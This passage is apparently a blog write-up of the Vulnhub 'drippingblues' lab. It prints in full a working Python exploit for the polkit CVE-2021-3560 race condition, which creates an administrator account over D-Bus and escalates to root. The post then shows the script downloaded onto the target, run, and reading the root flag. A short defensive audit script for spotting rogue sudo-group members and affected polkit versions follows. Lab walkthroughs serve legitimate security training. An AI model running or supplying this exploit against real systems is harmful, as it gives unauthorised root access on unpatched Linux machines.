┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues/Polkit-exploit]
└─$ ls
CVE-2021-3560-Auth-On.gif  CVE-2021-3560.py  CVE-2021-3560-Root.gif  README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues/Polkit-exploit]
└─$ cat CVE-2021-3560.py 
import os
import sys
import time
import subprocess
import random
import pwd


print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
time.sleep(3)

check = True
counter = 0
# Phase 1: race the authorization check. dbus-send asks accounts-daemon to
# create an administrator account; accounts-daemon asks polkit whether the
# caller may do that. The client is killed while polkit is still resolving
# the caller's uid from its bus name, which a vulnerable polkit mishandles.
while check:
        counter = counter +1
        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
        try:
                #print('1 - Running in process', process.pid)
                # The 6-9 ms timeout is the race window: too short and the
                # message never reaches accounts-daemon, too long and polkit
                # completes the lookup and denies the call normally.
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

        # Did this attempt win the race? The account now exists if `id` knows it.
        user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
        if user.find("uid") != -1:
                print("[+] User Created with the name of ahmed")
                print("[+] Timed out at: "+str(Random))
                check =False
                break
        if counter > 2000:
                print("[-] Couldn't add the user, try again it may work")
                sys.exit(0)

for i in range(200):
        #print(i)
        uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)

        #In case you need to put a password un-comment the code below and put your password after string:yourpassword'
        password = "string:"
        #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
        #password = f"string:{res.rstrip()}"

        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")

p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)

Upload the polkit exploit script to the target host and run it:

thugger@drippingblues:/tmp$ wget http://192.168.56.146:8000/CVE-2021-3560.py
--2023-01-12 12:03:42--  http://192.168.56.146:8000/CVE-2021-3560.py
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2434 (2,4K) [text/x-python]
Saving to: ‘CVE-2021-3560.py’

CVE-2021-3560.py                100%[=====================================================>]   2,38K  --.-KB/s    in 0s      

2023-01-12 12:03:42 (43,8 MB/s) - ‘CVE-2021-3560.py’ saved [2434/2434]

thugger@drippingblues:/tmp$ ls
CVE-2021-3560.py
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-apache2.service-9b2kuf
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-colord.service-8OMh5i
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-ModemManager.service-jiQIFh
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-switcheroo-control.service-0Suhsg
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-systemd-logind.service-8PS3Se
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-systemd-resolved.service-5sqh4h
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-systemd-timesyncd.service-jfou0f
systemd-private-cb6b39dbd2034afa8ee4a75fa2ee2a1d-upower.service-mVOjRe
tracker-extract-files.1001
tracker-extract-files.125
VMwareDnD
thugger@drippingblues:/tmp$ which python3
/usr/bin/python3
thugger@drippingblues:/tmp$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 

id: ‘ahmed’: no such user
[+] User Created with the name of ahmed
[+] Timed out at: 0.00862632954385928

Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User1000
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User1000
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User1000
[+] Timed out at: 0.008491884830672744
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (35211): Inappropriate ioctl for device
bash: no job control in this shell
root@drippingblues:/tmp# cd /root
root@drippingblues:~# ls -alh
total 24K
drwx------  4 root root 4,0K Eyl 19  2021 .
drwxr-xr-x 21 root root 4,0K Eyl 19  2021 ..
-rw-------  1 root root  382 Eyl 19  2021 .bash_history
drwx------  2 root root 4,0K Nis 23  2020 .cache
-r-x------  1 root root   32 Eyl 19  2021 root.txt
drwx------  2 root root 4,0K Eyl 19  2021 .ssh
root@drippingblues:~# cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8root@drippingblues:~# 
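As an added defender-side example (not part of the original writeup or of the Polkit-exploit project): the script below audits for what this exploit leaves behind, an extra member of the sudo/wheel group created through accountsservice, and gives a rough polkit version check. The /etc/group lines and the `pkaction` output are constructed samples; the version range is the upstream one (bug introduced in 0.113, fixed in 0.119).

```python
import re
from typing import Iterable, List, Tuple

# Constructed sample of /etc/group lines modelled on the run above: the
# exploit creates "ahmed" with accountType 1 (administrator), which on
# Ubuntu places the account in the sudo group.
SAMPLE_GROUP = """root:x:0:
sudo:x:27:thugger,ahmed
wheel:x:10:
users:x:100:
""".splitlines()

ADMIN_GROUPS = ("sudo", "wheel", "admin")


def unexpected_admins(group_lines: Iterable[str],
                      allowed: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (group, user) pairs for admin-group members not on the allowlist."""
    allowed = set(allowed)
    findings: List[Tuple[str, str]] = []
    for line in group_lines:
        fields = line.strip().split(":")
        if len(fields) != 4 or fields[0] not in ADMIN_GROUPS:
            continue
        members = [m for m in fields[3].split(",") if m]
        findings.extend((fields[0], m) for m in members if m not in allowed)
    return findings


# Upstream polkit treated a D-Bus caller that disconnected before the uid
# lookup finished as authorised (CVE-2021-3560). The faulty code entered in
# 0.113 and was fixed in 0.119; distributions backport both the bug and the
# fix, so this is a hint only and the package changelog is authoritative.
INTRODUCED_UPSTREAM = (0, 113)
FIXED_UPSTREAM = (0, 119)


def parse_pkaction_version(output: str) -> Tuple[int, int]:
    """Parse 'pkaction version 0.105' into (0, 105); ValueError if unparseable."""
    m = re.search(r"version\s+(\d+)\.(\d+)", output)
    if not m:
        raise ValueError(f"unrecognised pkaction output: {output!r}")
    return int(m.group(1)), int(m.group(2))


def upstream_version_affected(version: Tuple[int, int]) -> bool:
    """True when the version lies in the upstream range that carries the bug."""
    return INTRODUCED_UPSTREAM <= version < FIXED_UPSTREAM


if __name__ == "__main__":
    print(unexpected_admins(SAMPLE_GROUP, allowed={"thugger"}))
    v = parse_pkaction_version("pkaction version 0.105")   # constructed output
    print(v, upstream_version_affected(v))
```

Note that 0.105 falls outside the upstream range, yet distributions that backported the buggy commit into their 0.105 packages were affected, which is exactly why the version number alone cannot clear a host.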


Lessons learned

1. From /robots.txt I obtained /etc/dripispowerful.html, and my first instinct was that there was a local file inclusion vulnerability, but I only tried swapping in different file names and did not commit to fuzzing the parameter.

posted @ 2023-01-12 17:09  Jason_huawen  Views (281)  Comments (0)